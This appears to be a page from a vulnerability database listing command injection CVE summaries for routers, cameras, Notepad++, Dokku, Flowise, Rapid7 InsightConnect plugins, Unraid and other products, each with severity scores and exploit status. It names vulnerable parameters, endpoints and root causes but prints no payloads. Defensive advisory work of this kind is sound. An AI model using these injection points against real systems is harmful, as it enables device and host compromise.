Authenticated root command injection in the OpenWrt LuCI community Tailscale app (luci-app-tailscale-community) lets a logged-in web UI user run arbitrary OS commands as root through the tailscale.do_login RPC method. Because the user-supplied loginserver and loginserver_authkey values are placed inside a double-quoted shell string, $() and backtick substitutions are evaluated by the outer shell, turning configuration input into command execution. Reported by VulnCheck with a published GHSA advisory; no public exploit identified at time of analysis and the issue is not in CISA KEV.

Command Injection Luci
NVD GitHub
EPSS 1% CVSS 2.1
LOW POC Monitor

OS command injection in the Edimax EW-7478APC wireless access point firmware 1.04 allows a network-reachable authenticated attacker to execute arbitrary OS commands on the device by manipulating the `rootAPmac` parameter in POST requests to `/goform/formStaDrvSetup`. A public proof-of-concept exploit is available, indexed by VulDB and documented externally, and the vendor did not respond to responsible disclosure - making a vendor-released patch unlikely in the near term. The provided CVSS 4.0 score of 2.1 appears to significantly understate actual impact, as OS command injection on embedded Linux network devices typically yields full device compromise rather than the 'Low' impact across all three dimensions assigned in the vector.

Command Injection Ew 7478Apc
NVD VulDB
EPSS 1% CVSS 2.1
LOW Monitor

OS command injection in the Edimax EW-7478APC wireless access point (firmware 1.04) allows remote attackers with low-privilege credentials to execute arbitrary operating system commands by manipulating the rootAPmac parameter in a POST request to /goform/formiNICbasic. A public proof-of-concept exploit is available, materially lowering the barrier to exploitation. The vendor did not respond to coordinated disclosure, leaving no official patch path for affected devices.

Command Injection
NVD VulDB
EPSS 1% CVSS 2.1
LOW Monitor

OS command injection in Edimax EW-7478APC 1.04 allows a remote low-privileged attacker to execute arbitrary operating system commands by manipulating the submit-url parameter in POST requests to the /goform/formAccept endpoint. The vendor was notified prior to public disclosure but did not respond, leaving the vulnerability unpatched. A public proof-of-concept exploit has been disclosed, and the CVSS 4.0 impact metrics (VC:L/VI:L/VA:L) appear to significantly understate the realistic impact of OS command injection on an embedded network device, which typically yields full system control.

Command Injection
NVD VulDB
EPSS 2% CVSS 7.4
HIGH POC This Week

OS command injection in the D-Link DCS-935L Wi-Fi network camera (firmware 1.10.01) lets a remote attacker inject arbitrary operating-system commands through the UID POST parameter handled by the sub_400E40 function in setconf.cgi. The CVSS 4.0 vector requires low privileges (PR:L), so an attacker needs some level of authenticated/session access, after which they gain full confidentiality, integrity, and availability impact on the device. Publicly available exploit code exists (disclosed via VulDB), though there is no public exploit identified as actively exploited in the wild.

Command Injection D-Link Dcs 935L
NVD VulDB GitHub
EPSS 1% CVSS 2.1
LOW POC PATCH Monitor

Command injection in Wavlink WL-NU516U1-A router firmware (M16U1_V240425) allows authenticated remote attackers to execute arbitrary OS commands by submitting crafted POST parameters to the wireless CGI configuration handler. The affected function sub_401D68 within /cgi-bin/wireless.cgi fails to sanitize the SSID2G2, SSID5G2, AuthMethod2, and WPAPSK12 parameters before passing them to OS-level commands. A public proof-of-concept exploit is confirmed available on GitHub; this CVE is not currently listed in CISA's KEV catalog, but the vendor has already released a patched firmware.

Command Injection Wl Nu516U1 A
NVD VulDB GitHub
EPSS 1% CVSS 1.9
LOW POC Monitor

Command injection in ANTLR4's Go code generation target (GoTarget.java) allows a local low-privilege attacker to execute arbitrary OS commands via unsanitized input passed to the gofmt invocation, affecting all versions up to 4.13.2. This vulnerability is scoped entirely to local environments such as developer workstations or CI/CD pipelines running ANTLR4 Go target code generation. A publicly available proof-of-concept exploit exists per the GitHub disclosure, but this is not confirmed as actively exploited (not in CISA KEV), and the CVSS 4.0 base score of 1.9 reflects its genuinely constrained real-world impact.

Command Injection Java Antlr4
NVD VulDB GitHub
EPSS 1% CVSS 8.6
HIGH Act Now

Authenticated command injection in H.View HV-500S6 IP cameras allows a logged-in user to inject unsanitized XML field values into the device's certificate generation interface, which are passed into a backend certificate-creation shell command and executed with elevated privileges. Because exploitation requires valid credentials (CVSS 4.0 PR:H) but is reachable over the network with low complexity, an attacker who obtains any account on the device can run arbitrary OS commands and take full control of the camera. No public exploit has been identified at time of analysis and the CVE is not listed in CISA KEV.

Command Injection Hv 500S6 Ip Camera
NVD GitHub VulDB
EPSS 1% CVSS 10.0
CRITICAL PATCH Act Now

Unauthenticated remote code execution affects Kestra OSS (the open-source event-driven orchestration platform) prior to versions 1.0.45 and 1.3.21, where a flawed authentication whitelist lets attackers reach protected API endpoints without credentials. The AuthenticationFilter exempts the public config endpoint using a suffix match (request.getPath().endsWith("/configs")) instead of an exact path match, so any API path ending in 'configs' bypasses Basic Auth, allowing an attacker to create and run arbitrary workflows. Because the default-enabled script-execution plugins (shell, Python) run inside the worker container as root, this escalates directly to unauthenticated RCE. Carries a maximal CVSS of 10.0; there is no public exploit identified at time of analysis.

Command Injection Python RCE +1
NVD GitHub VulDB
EPSS 1% CVSS 7.8
HIGH POC PATCH This Week

Local code execution in Notepad++ before 8.9.6.1 occurs because the <GUIConfig name="commandLineInterpreter"> value in config.xml is loaded into _nppGUI._commandLineInterpreter with no validation, whitelist, or signature check, then passed directly to ShellExecute when a user invokes File → Open Containing Folder → cmd. An attacker who can plant or modify config.xml runs an arbitrary executable in the victim's session the next time they use this menu action. Publicly available exploit code exists (Exploit-DB 52606), but there is no public exploit identified as actively exploited; the issue is not in CISA KEV.

Command Injection Notepad Plus Plus
NVD GitHub Exploit-DB VulDB
EPSS 0% CVSS 7.8
HIGH PATCH This Week

Local OS command injection in Notepad++ before 8.9.6.1 lets an attacker who can write to a user's shortcuts.xml inject an arbitrary executable path into a <Command> entry under <UserDefinedCommands>, which feedUserCmds() loads into UserCommand._cmd with no validation and later passes straight to ShellExecute when the victim clicks the corresponding Run-menu item. Because the malicious entry renders as an ordinary Run-menu item, it doubles as a stealthy persistence mechanism that executes attacker-chosen binaries in the victim's user context. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but the fix is confirmed in release 8.9.6.1.

Command Injection Notepad Plus Plus
NVD GitHub VulDB
EPSS 1% CVSS 8.7
HIGH PATCH This Week

Remote code execution in the Cudy LT300 3.0 4G LTE router (firmware before 2.5.12) lets authenticated users run arbitrary OS commands by embedding shell metacharacters in the cbid.system.ntp.current POST parameter of the system time (NTP) configuration page. Because the CVSS 4.0 vector specifies PR:L, an attacker needs valid (low-privileged) web credentials but no user interaction, and successful injection yields full host compromise (VC/VI/VA all High). No public exploit identified at time of analysis; the flaw was reported by VulnCheck and a vendor patch is available.

Command Injection RCE Lt300 3 0
NVD
EPSS 1% CVSS 5.9
MEDIUM PATCH This Month

Cross-origin information disclosure in the Nx monorepo graph server (versions 17.0.4 through 22.7.1) exposes the full project dependency graph and workspace metadata to any website a developer visits while `nx graph` is running locally. The server unconditionally broadcasts `Access-Control-Allow-Origin: *`, bypassing the browser Same-Origin Policy and allowing attacker-controlled JavaScript to silently read internal project structure. In rare cases, the `/help` endpoint - which executes a workspace-configured target command - creates a path to arbitrary command injection on the developer's machine. No public exploit or CISA KEV listing identified at time of analysis.

Command Injection Information Disclosure Nx
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Container-to-host command execution in Dokku's cron plugin (versions prior to 0.38.7) lets an actor who can control an application's app.json schedule break out of the Docker container and run arbitrary commands on the host as the privileged Dokku user. Because the cron command was interpolated into a shell-evaluated line, special characters such as ';' or '>' were interpreted on the host rather than confined to the container, yielding a scope-changing escape (CVSS 9.9). No public exploit has been identified at time of analysis, but the root cause and fix are fully documented in the vendor advisory and patch.

Command Injection Docker Dokku
NVD GitHub VulDB
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

OS command injection in Dokku (the Docker-powered self-hosted PaaS) prior to version 0.38.2 allows an authenticated user with git push access to execute arbitrary shell commands as the privileged dokku user. The flaw stems from a permissive app-name validation regex that accepts shell metacharacters, which are then interpolated unquoted into a generated bash pre-receive hook; a semicolon in the app name terminates the intended command and runs attacker-supplied commands on git push. There is no public exploit identified at time of analysis, but the fix is confirmed in 0.38.2 and the underlying mechanics are fully documented in the GitHub advisory and PR #8590.

Command Injection Docker Dokku
NVD GitHub
EPSS 1% CVSS 8.0
HIGH PATCH This Week

OS command injection in Dell Container Storage Modules (CSM) version 2.16.0 - spanning the csi-powerstore, csi-unity, csi-powerflex, and csi-powermax CSI drivers - lets a remote, high-privileged attacker inject and execute arbitrary operating-system commands (CWE-78). Successful exploitation yields full confidentiality, integrity, and availability impact with a scope change, meaning command execution can reach beyond the vulnerable component into the surrounding host or cluster. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; the CVSS 3.1 base score is 8.0 (High).

Command Injection Dell Container Storage Modules
NVD
EPSS 1% CVSS 9.3
CRITICAL PATCH Act Now

Remote code execution in Flowise (versions 2.2.7-patch.1 through pre-3.0.6) lets attackers run arbitrary OS commands by abusing the Custom MCP feature, which is intended to spawn local MCP servers via tools like npx. Because the default installation runs with no authentication (unless FLOWISE_USERNAME/FLOWISE_PASSWORD are set) and lacks role-based access control, an attacker can POST a crafted JSON payload bearing the 'x-request-from: internal' header to /api/v1/node-load-method/customMCP and fully compromise the host container. Publicly available exploit code exists in the GHSA advisory, including a reverse-shell payload via nc.

Command Injection RCE Flowise
NVD GitHub VulDB
EPSS 1% CVSS 9.3
CRITICAL POC PATCH Act Now

Pre-authentication remote code execution in File Browser before 2.63.6 lets unauthenticated attackers run arbitrary OS commands when the optional Hook Authentication feature is enabled. Because login credentials are interpolated into an external shell command via os.Expand without sanitization, shell metacharacters placed in the username or password field at the login screen execute on the server before authentication occurs. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-m93h-4hw7-5qcm) confirms the flaw and CVSS 4.0 rates it 9.3 (Critical).

Command Injection Filebrowser
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

Arbitrary command execution in pnpm before 10.34.2 and 11.5.3 allows a malicious repository to run attacker-chosen native binaries as the developer or CI user during a routine install. The flaw stems from pnpm processing configDependencies in pnpm-workspace.yaml before command dispatch: a repo could declare pacquet/@pnpm/pacquet as a config dependency, causing pnpm to resolve a platform-specific @pacquet/<platform>-<arch>/pacquet binary from node_modules/.pnpm-config and spawn it. Publicly available exploit code exists, though EPSS is low (0.12%, 2nd percentile) and it is not in CISA KEV.

Command Injection Pnpm
NVD GitHub VulDB
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Arbitrary command execution in Vim's bundled zip plugin (autoload/zip.vim) affects builds from 9.1.1784 up to the 9.2.0678 fix on systems where the plugin falls back to PowerShell for archive operations. When browsing, reading, extracting, updating or deleting zip entries, the plugin quotes archive entry names for the shell but not for PowerShell, so a crafted entry name escapes the string context and runs attacker-supplied commands with the privileges of the user who merely opened or viewed the archive. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; risk is bounded to Windows/PowerShell-fallback deployments and requires user interaction.

Command Injection Vim Red Hat +1
NVD GitHub
EPSS 1% CVSS 8.6
HIGH Act Now

Authenticated command injection in Schneider Electric PowerLogic P7 power metering devices allows a privileged user to execute arbitrary OS commands with elevated privileges over a network-exposed service, fully compromising device integrity, confidentiality, and availability. The flaw (CWE-78) stems from improper neutralization of special elements passed to an underlying OS command. No public exploit identified at time of analysis, and the device is not listed in CISA KEV; EPSS data was not provided.

Command Injection Powerlogic P7
NVD VulDB
EPSS 1% CVSS 7.8
HIGH This Week

OS command injection in Dell Display and Peripheral Manager (DDPM) for macOS, all versions prior to 2.3, allows a low-privileged local user to inject and execute arbitrary operating-system commands through improperly neutralized special elements (CWE-78). Because the affected component is a privileged peripheral-management utility, successful injection can yield command execution with full impact to confidentiality, integrity, and availability. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, so risk is currently theoretical but high-impact for systems with this Dell utility installed.

Command Injection Dell Display And Peripheral Manager
NVD
EPSS 1% CVSS 8.8
HIGH PATCH This Week

OS command injection in Rapid7's InsightConnect Tcpdump Plugin (versions before 2.0.0) on Linux lets an authenticated attacker run arbitrary operating-system commands by injecting shell metacharacters into the 'options' or 'filter' parameters, which are unsafely concatenated into a tcpdump shell invocation. An attacker holding low-privileged access to a SOAR workflow that uses this plugin can fully compromise the orchestrator host (high confidentiality, integrity, and availability impact). There is no public exploit identified at time of analysis and the issue is not on the CISA KEV list; EPSS is modest at 0.73%.

Command Injection Insightconnect Tcpdump Plugin
NVD VulDB
EPSS 1% CVSS 9.8
CRITICAL PATCH Act Now

OS command injection in Rapid7's InsightConnect Traceroute Plugin (Linux, versions below 1.0.3) lets attackers inject arbitrary shell commands through the traceroute action's host, port, max_ttl, count, or time_out parameters, which are concatenated into a shell command without sufficient validation. Successful exploitation grants full command execution in the plugin container with the same impact on confidentiality, integrity, and availability. This was reported by the vendor (Rapid7) with a fix in 1.0.3; there is no public exploit identified at time of analysis, and EPSS sits at a modest 0.55% (42nd percentile).

Command Injection Insightconnect Traceroute Plugin
NVD VulDB
EPSS 1% CVSS 9.8
CRITICAL PATCH Act Now

Remote OS command injection in Rapid7's InsightConnect AWK Plugin (versions below 1.2.2 on Linux) lets attackers run arbitrary operating-system commands through the process_string action's text or expression parameters, which are unsafely concatenated into a shell command. The CVSS 9.8 rating reflects full confidentiality, integrity, and availability loss with no privileges or user interaction required by the vector. There is no public exploit identified at time of analysis, EPSS is low (0.55%), and CISA SSVC marks exploitation as none, so risk today is potential rather than observed.

Command Injection Insightconnect Awk Plugin
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH This Week

OS command injection in Rapid7's InsightConnect Finger Plugin (versions prior to 1.0.3) on Linux lets an authenticated attacker run arbitrary operating-system commands by injecting shell metacharacters into the user or host parameters, which are passed unsanitized into a constructed shell command (CWE-78). Because the plugin executes within the InsightConnect SOAR orchestrator, successful exploitation yields full read/write and availability impact on the host running the plugin. No public exploit is identified at time of analysis, and EPSS estimates only a 0.73% 30-day exploitation probability.

Command Injection Insightconnect Finger Plugin
NVD VulDB
EPSS 1% CVSS 9.8
CRITICAL PATCH Act Now

OS command injection in Rapid7's InsightConnect Translate (TR) Plugin on Linux lets remote attackers run arbitrary shell commands by injecting into the 'text' or 'expression' parameters of the TR action, which are concatenated into a shell command without sanitization (CWE-78). All plugin versions before 2.0.3 are affected. There is no public exploit identified at time of analysis and EPSS is low (0.55%), but the flaw yields full system compromise per the vendor's own SSVC 'total' technical-impact rating.

Command Injection Insightconnect Tr Plugin
NVD VulDB
EPSS 1% CVSS 9.8
CRITICAL PATCH Act Now

OS command injection in Rapid7's InsightConnect Ping Plugin (versions before 1.0.4) on Linux lets attackers run arbitrary operating-system commands by injecting shell metacharacters into the host parameter of the plugin's ping action, which is concatenated into a shell command without proper sanitization. Any actor able to influence the host input flowing into this SOAR plugin gains full code execution on the plugin's runtime host. There is no public exploit identified at time of analysis, EPSS is low (0.55%), and CISA's SSVC marks exploitation as 'none' and the flaw as not automatable, so risk is real but not yet observed in the wild.

Command Injection Insightconnect Ping Plugin
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH This Week

OS command injection in the Rapid7 InsightConnect Sed Plugin on Linux lets an authenticated operator inject arbitrary shell commands through the plugin's `expression` parameter, which is passed to the underlying `sed` invocation without sufficient sanitization. Because InsightConnect is a SOAR orchestration platform, a low-privileged workflow author or connected user (PR:L) can achieve full code execution in the plugin's runtime context (C:H/I:H/A:H, CVSS 8.8). There is no public exploit identified at time of analysis and the issue is not on CISA KEV.

Command Injection Insightconnect Sed Plugin
NVD VulDB
EPSS 1% CVSS 8.8
HIGH This Week

Remote code execution in Quest NetVault Backup allows authenticated remote attackers - who can bypass the product's existing authentication mechanism - to run arbitrary OS commands as SYSTEM via the NVBULogDaemon JSON-RPC interface. The flaw stems from unsanitized user-supplied input being passed into a system call (CWE-78), and the credentialed authentication barrier is undermined by an acknowledged bypass, effectively widening exposure. No public exploit has been identified at time of analysis, but the issue was disclosed by Trend Micro ZDI (ZDI-26-376) and carries a CVSS of 8.8.

Command Injection RCE Netvault Backup
NVD
EPSS 1% CVSS 8.8
HIGH PATCH This Week

OS command injection in Rapid7's InsightConnect SQLmap Plugin (versions before 2.0.1) on Linux lets an authenticated InsightConnect user inject arbitrary operating-system commands through the api_host or api_port fields supplied while configuring the plugin's connection. Because the plugin runs inside the InsightConnect orchestration runtime, a successful injection yields code execution in that automation context (CVSS 8.8, CWE-78). No public exploit identified at time of analysis, and SSVC records exploitation status as none; EPSS is modest at 0.73% (50th percentile).

Command Injection Insightconnect Sqlmap Plugin
NVD VulDB
EPSS 1% CVSS 8.8
HIGH PATCH This Week

OS command injection in the Rapid7 InsightConnect RPM Plugin on Linux lets authenticated users run arbitrary operating-system commands by injecting shell metacharacters into the repo, key, or name parameters, which are concatenated into a shell command without sanitization (CWE-78). All versions before 1.0.2 are affected. There is no public exploit identified at time of analysis, and the EPSS probability is low (0.73%, 50th percentile).

Command Injection Insightconnect Rpm Plugin
NVD VulDB
EPSS 1% CVSS 8.8
HIGH This Week

Remote authenticated command injection in Unraid's web management server allows attackers to execute arbitrary OS commands as the www-data user by abusing unsanitized input in ToggleState.php. Any user with low-privilege authenticated web access can chain this CWE-78 flaw into full code execution on the underlying NAS host. Discovered and reported through ZDI (ZDI-CAN-30134 / ZDI-26-386); no public exploit identified at time of analysis and no CISA KEV listing.

Command Injection RCE PHP +1
NVD
EPSS 1% CVSS 8.8
HIGH This Week

Authenticated remote code execution in Unraid stems from OS command injection in the web server's FileUpload.php, where a user-supplied string is passed to a system call without validation, letting any logged-in attacker run arbitrary commands as the www-data user. Tracked as ZDI-CAN-30116 and disclosed via the Zero Day Initiative, it carries a CVSS 8.8 rating; no public exploit identified at time of analysis, and it is not listed in CISA KEV.

Command Injection RCE PHP +1
NVD
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

Stored cross-site scripting leading to OS command execution in SiYuan, an open-source personal knowledge management system, affects all desktop client versions prior to 3.7.0. Untrusted marketplace package metadata (name, version, author, description) is serialized via JSON.stringify() into a single-quoted data-obj HTML attribute without escaping single quotes or angle brackets, so a package name containing a single quote breaks out of the attribute and injects arbitrary HTML; because the Electron BrowserWindow runs with nodeIntegration:true and contextIsolation:false, the DOM XSS escalates to arbitrary command execution on the host. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-x88j-wgpr-h22x) notes this is the same root cause and impact as a prior advisory, reached through a sibling sink the earlier patch missed.

Command Injection XSS Siyuan
NVD GitHub
EPSS 1% CVSS 8.0
HIGH PATCH This Week

Command injection in Warp's prompt branch-selector chip lets a crafted Git branch name execute in the victim's shell when they click that branch in the UI. It affects Warp builds from 0.2025.08.06.08.12.stable_00 up to the fix in 0.2026.05.06.15.42.stable_01, and is exploitable by anyone able to publish a branch to a repository the victim opens in Warp. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Command Injection Warp
NVD GitHub
Prev Page 2 of 87 Next

Quick Facts

Typical Severity
CRITICAL
Category
web
Total CVEs
7742

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy